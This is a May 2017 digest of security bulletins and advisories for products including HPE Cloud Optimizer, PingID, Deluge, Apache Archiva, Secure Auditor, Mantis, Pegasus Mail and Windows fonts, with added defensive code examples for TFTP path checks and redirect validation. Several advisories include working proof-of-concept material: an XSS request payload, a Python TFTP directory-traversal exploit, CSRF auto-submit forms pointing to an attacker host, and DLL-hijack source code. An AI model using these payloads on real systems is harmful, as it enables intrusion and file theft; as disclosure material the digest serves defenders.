Wednesday, May 24, 2017

[security bulletin] HPESBGN03748 rev.1 - HPE Cloud Optimizer, Remote Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03748en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbgn03748en_us
Version: 1

HPESBGN03748 rev.1 - HPE Cloud Optimizer, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2017-05-18
Last Updated: 2017-05-18

Potential Security Impact: Remote: Disclosure of Information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HPE Cloud
Optimizer. The vulnerability could be remotely exploited resulting in
disclosure of information.

References:

  - CVE-2017-8944 - remote disclosure of information

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Cloud Optimizer v3.0x

BACKGROUND

  CVSS Base Metrics
  =================
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

    CVE-2017-8944
      7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
      7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)

    Information on CVSS is documented in
    HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

Hewlett Packard Company thanks rgod working with Trend Micro's Zero Day
Initiative for reporting this issue to security-alert@hpe.com

RESOLUTION

HPE has made the following software updates and mitigation information
available to resolve the vulnerability in the impacted versions of HPE Cloud
Optimizer.

Please upgrade to Cloud Optimizer v3.01 and then install the latest patch
using the links below:

* For Installer:
<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/LID/VPVINSTALLER_00007>

* Using Specified Repository (using .zip) for Virtual Appliance:
<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/LID/VPVZIP_00007>

* Using CD-ROM Updates (using .iso) for Virtual Appliance:
<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/LID/VPVISO_00006>

*Note:* For versions prior to v3.01, please first upgrade to v3.01 as
described in Chapter 4 of the product installation guide - "Upgrading
Earlier Versions to HPE Cloud Optimizer 3.01".

HISTORY
Version:1 (rev.1) - 18 May 2017 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

PingID (MFA) - Reflected Cross-Site Scripting

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  PingID (MFA) [1]
# Vendor:   Ping Identity Corporation
# CSNC ID:  CSNC-2017-013
# Subject:   Reflected Cross-Site Scripting
# Risk:        High
# Effect:     Remotely exploitable
# Author:   Stephan Sekula <stephan.sekula@compass-security.com>
# Date:      18.04.2017
#
#############################################################

Introduction:
-------------
With PingID MFA, you can easily control when your users need to authenticate with a
second factor. You can configure your policies based upon the following:
    Group - Require MFA for members of a specific group.
    Application - Require MFA for specific applications.
    Geofence - Require MFA if the user is outside a pre-set geofence.
    Rooted or Jailbroken device - Require MFA if the user's device is rooted or jailbroken.
    Network IP - Require MFA if the device isn't in a specific IP range.
PingID MFA delivers the granular security that your policies require with the ease
of use your users want. [1]

Compass Security discovered a web application security flaw in PingID's authentication
process, which allows an attacker to manipulate the resulting website. This allows,
for instance, attacking the user's browser or redirecting the user to a phishing website.


Technical Description
---------------------
During the authentication process, a message parameter is used, which can
be manipulated. If this parameter contains JavaScript code, it is executed
in the user's browser. Exploiting the vulnerability will lead to so-called
Cross-Site Scripting (XSS), allowing the execution of JavaScript in the
context of the victim.

Request:
POST /pingid/ppm/auth/otp HTTP/1.1
Host: authenticator.pingone.com
[CUT]
Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

otp=123456&message=<script>alert(0)</script>

Response:
HTTP/1.1 200 OK
Date: Thu, 13 Apr 2017 11:21:45 GMT
Server:
Cache-Control: no-cache, no-store
[CUT]
Connection: close
X-Content-Type-Options: nosniff
Content-Length: 8313

<!DOCTYPE html>
<html>
<head>
    [CUT]
</head>
<body>
[CUT]
    <div class="admin-message"><script>alert(0)</script></div>
[CUT]
</body>
</html>


Workaround / Fix:
-----------------
The vendor has addressed the vulnerability. In general, this issue can be fixed by
properly encoding all output, which is posted back to the user.
For instance, using HTML encoding, to convert < to &lt; and > to &gt;.


Timeline:
---------
2017-05-16:     Coordinated public disclosure date
2017-05-03:     Release of fixed version/patch
2017-04-20:     Initial vendor response
2017-04-19:     Initial vendor notification
2017-04-13:     Discovery by Stephan Sekula


References:
-----------
[1] https://www.pingidentity.com/en/products/pingid.html

[SECURITY] [DSA 3856-1] deluge security update

-------------------------------------------------------------------------
Debian Security Advisory DSA-3856-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
May 18, 2017                          https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : deluge
CVE ID         : CVE-2017-7178 CVE-2017-9031

Two vulnerabilities have been discovered in the web interface of the
Deluge BitTorrent client (directory traversal and cross-site request
forgery).

For the stable distribution (jessie), these problems have been fixed in
version 1.3.10-3+deb8u1.

For the unstable distribution (sid), these problems have been fixed in
version 1.3.13+git20161130.48cedf63-3.

We recommend that you upgrade your deluge packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

[SECURITY] CVE-2017-5657: Apache Archiva CSRF vulnerability for REST endpoints

CVE-2017-5657: Apache Archiva CSRF vulnerabilities for various REST endpoints

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
    Archiva 2.0.0 - 2.2.1
    The unsupported versions 1.x are also affected.

Several REST service endpoints of Apache Archiva are not protected against
Cross Site Request Forgery (CSRF) attacks. A malicious site opened in the same
browser as the Archiva site may send an HTML response that performs arbitrary
actions on Archiva services, with the same rights as the active Archiva
session (e.g. administrator rights).

Mitigation:
  All users are recommended to upgrade to Archiva 2.2.3 or higher,
  where additional measures are taken to verify the origin of REST requests.

References:
http://archiva.apache.org/security.html#CVE-2017-5657

The newest Archiva version can be downloaded from:
http://archiva.apache.org/download.cgi

[SECURITY] [DSA 3858-1] openjdk-7 security update

Debian Security Advisory DSA-3858-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
May 19, 2017                          https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : openjdk-7
CVE ID         : CVE-2017-3509 CVE-2017-3511 CVE-2017-3526 CVE-2017-3533
                 CVE-2017-3539 CVE-2017-3544

Several vulnerabilities have been discovered in OpenJDK, an
implementation of the Oracle Java platform, resulting in privilege
escalation, denial of service, newline injection in SMTP or use of
insecure cryptography.

For the stable distribution (jessie), these problems have been fixed in
version 7u131-2.6.9-2~deb8u1.

We recommend that you upgrade your openjdk-7 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal

[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec



Vendor:
====================
www.secure-bytes.com



Product:
=====================
Secure Auditor - v3.0

Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.



Vulnerability Type:
===================
Directory Traversal



CVE Reference:
==============
CVE-2017-9024



Security Issue:
================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.




Exploit/POC:
=============
import sys,socket

print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'

HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01"                #TFTP Read
PAYLOAD += FILE+"\x00"              #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"           #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
==================================
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
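
An added example, not part of the advisory or of the vendor's code: one way a TFTP server can validate the filename in a read request (RRQ) so that ../ sequences such as the one in the PoC above cannot leave the served directory. The function names and the sample packets are constructed for illustration.

```python
import os
import struct
import tempfile

OP_RRQ = 1                 # RFC 1350 opcode: read request
OP_ERROR = 5               # RFC 1350 opcode: error
ERR_ACCESS_VIOLATION = 2   # RFC 1350 error code


class RejectedRequest(Exception):
    """Raised when a request must be refused instead of served."""


def parse_rrq(packet):
    """Split an RRQ into (filename, mode): 2-byte opcode, filename NUL, mode NUL."""
    if len(packet) < 4 or struct.unpack("!H", packet[:2])[0] != OP_RRQ:
        raise RejectedRequest("not a read request")
    fields = packet[2:].split(b"\x00")
    # A well-formed RRQ splits into [filename, mode, ...] plus a trailing empty field.
    if len(fields) < 3 or not fields[0] or not fields[1]:
        raise RejectedRequest("malformed read request")
    try:
        filename = fields[0].decode("ascii")
        mode = fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        raise RejectedRequest("non-ASCII field")
    if mode not in ("netascii", "octet"):
        raise RejectedRequest("unsupported mode")
    return filename, mode


def resolve_in_root(root, filename):
    """Map a requested name to a path under root, or raise RejectedRequest."""
    # Treat "\" as a separator too: the affected server runs on Windows.
    parts = filename.replace("\\", "/").split("/")
    if parts[0] == "" or ":" in filename:
        raise RejectedRequest("absolute path or drive specifier")
    if ".." in parts:
        raise RejectedRequest("parent-directory component")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, *parts))
    # Containment check on the resolved path also catches symlinks out of root.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise RejectedRequest("resolves outside the served directory")
    return candidate


def error_packet(message):
    """Build the TFTP ERROR packet sent back for a refused request."""
    header = struct.pack("!HH", OP_ERROR, ERR_ACCESS_VIOLATION)
    return header + message.encode("ascii") + b"\x00"


def handle_rrq(root, packet):
    """Return (path, None) when the request may be served, else (None, error)."""
    try:
        filename, _mode = parse_rrq(packet)
        return resolve_in_root(root, filename), None
    except RejectedRequest as exc:
        return None, error_packet(str(exc))


if __name__ == "__main__":
    served = tempfile.mkdtemp()  # stand-in for the directory the server exports
    samples = [                  # constructed request packets
        b"\x00\x01router1.cfg\x00octet\x00",
        b"\x00\x01../../../../Windows/system.ini\x00netascii\x00",
        b"\x00\x01..\\..\\secret.txt\x00octet\x00",
        b"\x00\x01C:/Windows/system.ini\x00octet\x00",
    ]
    for pkt in samples:
        path, err = handle_rrq(served, pkt)
        print(pkt[2:].split(b"\x00")[0], "->", path if err is None else err)
```

Refused requests get an ERROR packet with code 2 (access violation) rather than file data, which also gives a clear signal to log and alert on.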

May 2017 - SourceTree - Critical Security Advisory

This email refers to the advisory found at
https://confluence.atlassian.com/x/jW2xNQ .


CVE ID:

* CVE-2017-8768.

Product: SourceTree.

Affected SourceTree product versions:

* SourceTree for Mac 1.4.0 <= version < 2.5.1
* SourceTree for Windows 0.8.4b <= version < 2.0.20.1


Fixed SourceTree product versions:

* Versions of SourceTree for Mac equal to and above 2.5.1 contain a
fix for this issue.
* Versions of SourceTree for Windows equal to and above 2.0.20.1
contain a fix for this issue.

Summary:
This advisory discloses a critical security vulnerability in versions
of SourceTree for Mac starting with 1.4.0 but before 2.5.1 and
SourceTree for Windows starting with 0.8.4b but before 2.0.20.1.

Customers who have upgraded SourceTree for Mac to version 2.5.1 are
not affected.

Customers who have upgraded SourceTree for Windows to version 2.0.20.1
are not affected.

Customers who have downloaded and installed SourceTree for Mac
starting with 1.4.0 but before 2.5.1 (the fixed version for 2.5.x) or
who have downloaded and installed SourceTree for Windows starting with
0.8.4b but before 2.0.20.1 (the fixed version for 2.0.x) please
upgrade SourceTree to the latest version to fix this vulnerability.

Command Injection - CVE-2017-8768:

Severity:
Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels. The
scale allows us to rank the severity as critical, high, moderate or
low.
This is our assessment and you should evaluate its applicability to
your own IT environment.


Description:

SourceTree for Mac and Windows are affected by a command injection
vulnerability in URI handling. The vulnerability can be triggered
through a browser or the SourceTree interface.
Versions of SourceTree for Mac starting with 1.4.0 but before 2.5.1
and versions of SourceTree for Windows starting with 0.8.4b but before
2.0.20.1 are affected by this vulnerability. The issue for SourceTree
for Mac can be found at https://jira.atlassian.com/browse/SRCTREE-4738
and for SourceTree for Windows at
https://jira.atlassian.com/browse/SRCTREEWIN-7161 .

Remediation:

Upgrade SourceTree for Mac to version 2.5.1 or higher. Please note
that since SourceTree for Mac 2.5.0 Mac OSX 10.11 or later is
required.
Upgrade SourceTree for Windows to version 2.0.20.1 or higher.

For a full description of the latest version of SourceTree, see the
release notes for Mac
(https://www.sourcetreeapp.com/update/releasenotes/2.5.1.html) and for
Windows (https://www.sourcetreeapp.com/update/windows/ga/ReleaseNotes_2.0.20.1.html).
You can download the latest version of SourceTree from
https://www.sourcetreeapp.com/.


Acknowledgements:
Atlassian would like to credit Yu Hong for reporting this issue to us.


Support:
If you have questions or concerns regarding this advisory, please
raise a support request at https://support.atlassian.com/.

CVE-2017-9046 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection

[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec



Vendor:
================
www.mantisbt.org



Product:
=========
Mantis Bug Tracker
1.3.10 / v2.3.0


MantisBT is a popular free web-based bug tracking system. It is written in PHP and works with MySQL, MS SQL, and PostgreSQL databases.



Vulnerability Type:
========================
CSRF Permalink Injection



CVE Reference:
==============
CVE-2017-7620



Security Issue:
================
Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage.

The vulnerable code in the "string_api.php" PHP file, under mantis/core/, did not account for supplied backslashes.
Line: 270

# Check for URL's pointing to other domains
if( 0 == $t_type || empty( $t_matches['script'] ) ||
    3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {

    return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
}

# Start extracting regex matches
$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];




Exploit/POC:
=============
<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
<script>document.forms[0].submit()</script>
</form>

OR

<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
<script>document.forms[0].submit()</script>
</form>



Network Access:
===============
Remote




Severity:
=========
Medium



Disclosure Timeline:
=============================
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure
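
An added example, not part of the advisory or of MantisBT's code: the pattern quoted under "Security Issue" looks for a scheme separator (":"), which a value beginning with \/ does not contain, while browsers read "\" as "/" and so treat it like //host. The hardened check below is one possible approach and not the vendor's fix; the host name attacker.example and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Python transcription of the pattern quoted from string_api.php. The rest of
# the MantisBT function is not reproduced here.
QUOTED_PATTERN = re.compile(r"(?:[^:]*)?:/*")


def quoted_pattern_matches(url):
    """True when the quoted pattern finds a scheme separator in url."""
    return QUOTED_PATTERN.search(url) is not None


def is_local_target(url):
    """Hardened check (assumption): accept only relative, same-site targets."""
    # Control characters are dropped by browsers and can hide a host part.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in url):
        return False
    # Read the value the way a browser does: "\" is equivalent to "/".
    candidate = url.strip().replace("\\", "/")
    if candidate.startswith("//"):
        return False  # protocol-relative URL, i.e. another host
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return False  # unparseable input is never a safe target
    return parts.scheme == "" and parts.netloc == ""


def safe_redirect_target(url, fallback="index.php"):
    """Return the normalized local target, or the fallback page."""
    if not is_local_target(url):
        return fallback
    return url.strip().replace("\\", "/")


# Constructed sample values for the url parameter.
SAMPLES = [
    "view.php?id=7",
    "search.php?project_id=1&sticky=on",
    "http://attacker.example/",
    "//attacker.example",
    "\\/attacker.example",
]


def audit(samples):
    """Return (value, quoted pattern matched?, target actually used) rows."""
    return [(s, quoted_pattern_matches(s), safe_redirect_target(s)) for s in samples]


if __name__ == "__main__":
    for value, matched, target in audit(SAMPLES):
        print(f"{value!r:40} pattern_match={matched!s:5} redirect_to={target}")
```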




CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution

[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC



Vendor:
=============
www.pmail.com



Product:
===========================
Pegasus "winpm-32.exe"
v4.72 build 572


Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.



Vulnerability Type:
======================
Remote Code Execution




CVE Reference:
==============
CVE-2017-9046



Security Issue:
================
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:" link
if a DLL named "ssgp.dll" exists on the victim's Desktop. Tested successfully using Internet Explorer Web Browser.

e.g.

<a href="mailto:name@victim.com">Link text</a>

Place "ssgp.dll" on the desktop, then visit the webpage in "Internet Explorer" and click the mailto: link; arbitrary code is executed
and Pegasus (pmail) is then launched.

The user needs to have set up PMAIL with the "mailto:" link option on install.


Exploit:
========
1) Set Pegasus as default Email client for opening Emails, and set up PMAIL with "mailto:" link option on install.


2) Compile "ssgp.dll" as DLL using below 'C' code.

#include<windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
    break;
  }

return 0;
}



3) Place "ssgp.dll" on Desktop


4) Create an HTML file with following in the web server root directory.
<a href="mailto:name@victim.com">Pegasus Exploit POC</a>


5) Open webpage in Internet Explorer Web Browser and click malicious mailto: link.


Our code gets executed...



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=====================================
Vendor Notification:  October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017  : Public Disclosure




HPESBHF03744 rev.1 - HPE Intelligent Management Center (iMC) PLAT running OpenSSL, Remote Denial of Service (DoS)

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03744en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbhf03744en_us
Version: 1

HPESBHF03744 rev.1 - HPE Intelligent Management Center (iMC) PLAT running OpenSSL, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2017-05-12
Last Updated: 2017-05-12

Potential Security Impact: Remote: Denial of Service (DoS)

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities with OpenSSL have been addressed for HPE Intelligent Management Center (iMC) PLAT. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS).

References:

  - CVE-2016-7053 - Remote Denial of Service (DoS)
  - CVE-2016-7054 - Remote Denial of Service (DoS)
  - CVE-2016-7055 - Remote Denial of Service (DoS)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HP Intelligent Management Center (iMC) All versions prior to IMC PLAT 7.3 E0504P04 - Please refer to the RESOLUTION below for a list of impacted products.

BACKGROUND

  CVSS Base Metrics
  =================
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

    CVE-2016-7053
      3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
      4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

    CVE-2016-7054
      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

    CVE-2016-7055
      3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
      2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)

    Information on CVSS is documented in
    HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following software update available to resolve the vulnerability in the iMC PLAT network products listed.

  + **iMC PLAT - Version: Fixed in IMC PLAT 7.3 E0504P04**
    * HP Network Products
      - JD125A  HP IMC Std S/W Platform w/100-node
      - JD126A  HP IMC Ent S/W Platform w/100-node
      - JD808A  HP IMC Ent Platform w/100-node License
      - JD814A   HP A-IMC Enterprise Edition Software DVD Media
      - JD815A  HP IMC Std Platform w/100-node License
      - JD816A  HP A-IMC Standard Edition Software DVD Media
      - JF288AAE  HP Network Director to Intelligent Management Center Upgrade E-LTU
      - JF289AAE  HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
      - JF377A  HP IMC Std S/W Platform w/100-node Lic
      - JF377AAE  HP IMC Std S/W Pltfrm w/100-node E-LTU
      - JF378A  HP IMC Ent S/W Platform w/200-node Lic
      - JF378AAE  HP IMC Ent S/W Pltfrm w/200-node E-LTU
      - JG546AAE  HP IMC Basic SW Platform w/50-node E-LTU
      - JG548AAE  HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
      - JG549AAE  HP PCM+ to IMC Std Upgr w/200-node E-LTU
      - JG747AAE  HP IMC Std SW Plat w/ 50 Nodes E-LTU
      - JG748AAE  HP IMC Ent SW Plat w/ 50 Nodes E-LTU
      - JG768AAE  HP PCM+ to IMC Std Upg w/ 200-node E-LTU
      - JG550AAE HPE PCM+ Mobility Manager to IMC Basic WLAN Platform Upgrade 50-node and 150-AP E-LTU
      - JG590AAE HPE IMC Basic WLAN Manager Software Platform 50 Access Point E-LTU
      - JG660AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU
      - JG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU
      - JG767AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU
      - JG768AAE HPE PCM+ to IMC Standard Software Platform Upgrade with 200-node E-LTU



**Note:** Please contact HPE Technical Support if any assistance is needed acquiring the software updates.

HISTORY
Version:1 (rev.1) - 11 May 2017 Initial release


Secunia Research: Microsoft Windows Heap-based Buffer Overflow Vulnerabilities

======================================================================

                     Secunia Research 2016/05/22

    Microsoft Windows Heap-based Buffer Overflow Vulnerabilities

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerabilities.......................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Flexera Software...............................................8
Verification.........................................................9

======================================================================
1) Affected Software

* Microsoft Windows 10
* Microsoft Windows 7
* Microsoft Windows 8.1
* Microsoft Windows RT 8.1
* Microsoft Windows Server 2008
* Microsoft Windows Server 2012
* Microsoft Windows Server 2016
* Microsoft Windows Vista

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where:  From remote

======================================================================
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in Microsoft
Windows, which can be exploited by malicious people to compromise a
vulnerable system.

1) An error within the "LoadUvsTable()" function can be exploited to
cause a heap-based buffer overflow via a font file containing
specially crafted Unicode Variation Sequences tables.

2) An integer overflow error within the "LoadFont()" function can be
exploited to cause a heap-based buffer overflow via a font file
containing specially crafted Unicode Variation Sequences tables.

Successful exploitation of the vulnerabilities allows execution of
arbitrary code.

The vulnerabilities are confirmed on a fully patched Windows 10
Professional (gdi32full.dll version 10.0.14393.576) and Windows 7
Professional (usp10.dll version 1.626.7601.23585). Other versions
may also be affected.

======================================================================
4) Solution

Apply update.
https://technet.microsoft.com/library/security/MS17-013

======================================================================
5) Time Table

2016/12/13 - Notified vendor about an incomplete fix of CVE-2016-7274.
2016/12/14 - Release of Secunia Advisory SA74000 due to details
             implicitly being public.
2016/12/15 - Update of SA74000 with a further vulnerability.
2016/12/29 - Vendor communication regarding root cause analysis.
2017/01/25 - Vendor patch scheduled for February 2017.
2017/02/14 - Vendor announces delay of February 2017 patch releases.
2017/03/06 - Vendor patch scheduled for March 2017.
2017/03/14 - Updated Secunia Advisory SA74000 due to release
             of vendor patch.
2017/05/22 - Public disclosure of Secunia Research Advisory.

======================================================================
6) Credits

Discovered by Hossein Lotfi, Secunia Research at Flexera Software.

======================================================================
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2017-0014 identifier for the vulnerabilities.

======================================================================
8) About Flexera Software

Flexera Software helps application producers and enterprises increase
application usage and the value they derive from their software.


http://www.flexerasoftware.com/enterprise/company/about/

Flexera Software  delivers  market-leading  Software  Vulnerability
Management solutions enabling enterprises to proactively identify and
remediate software vulnerabilities, effectively reducing the risk of
costly security breaches.

http://www.flexerasoftware.com/enterprise/products/

Flexera  Software  supports  and  contributes  to  the community in
several ways.  We have always believed that reliable vulnerability
intelligence and tools to aid identifying and fixing vulnerabilities
should be  freely available  for  consumers  to ensure that users,
who care about their online privacy and security, can stay secure.
Only a few vendors address vulnerabilities in a proper way and help
users get updated  and  stay secure.  End-users (whether private
individuals or businesses) are otherwise left largely alone,  and
that is why back in 2002, Secunia Research started investigating,
coordinating  disclosure  and  verifying software vulnerabilities.
In  2016,  Secunia Research  became  a  part  of  Flexera Software
and today our in-house software vulnerability research remains the
core  of  the  Software  Vulnerability  Management  products  at
Flexera Software.

https://secuniaresearch.flexerasoftware.com/secunia_research/

The  public  Advisory database  contains sufficient information  for
researchers, security enthusiasts, and consumers to lookup individual
products and vulnerabilities  and  assess, whether they need to take
any actions to secure their systems or whether a given vulnerability
has already been discovered

https://secuniaresearch.flexerasoftware.com/advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2017-9/

Complete list of vulnerability reports published by Secunia Research:
https://secuniaresearch.flexerasoftware.com/secunia_research/

Secunia Research Blog at Flexera Software:
http://blogs.flexerasoftware.com/secunia-research/2016/12/microsoft_windows_loaduvstable_heap_based_buffer_overflow_vulnerability.html


======================================================================

[SECURITY] [DSA 3861-1] libtasn1-6 security update

-------------------------------------------------------------------------
Debian Security Advisory DSA-3861-1                   security@debian.org
https://www.debian.org/security/                       Sebastien Delafond
May 24, 2017                          https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : libtasn1-6
CVE ID         : CVE-2017-6891
Debian Bug     : 863186

Jakub Jirasek of Secunia Research discovered that libtasn1, a library
used to handle Abstract Syntax Notation One structures, did not
properly validate its input. This would allow an attacker to cause a
crash by denial-of-service, or potentially execute arbitrary code, by
tricking a user into processing a maliciously crafted assignments
file.

For the stable distribution (jessie), this problem has been fixed in
version 4.2-3+deb8u3.

We recommend that you upgrade your libtasn1-6 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

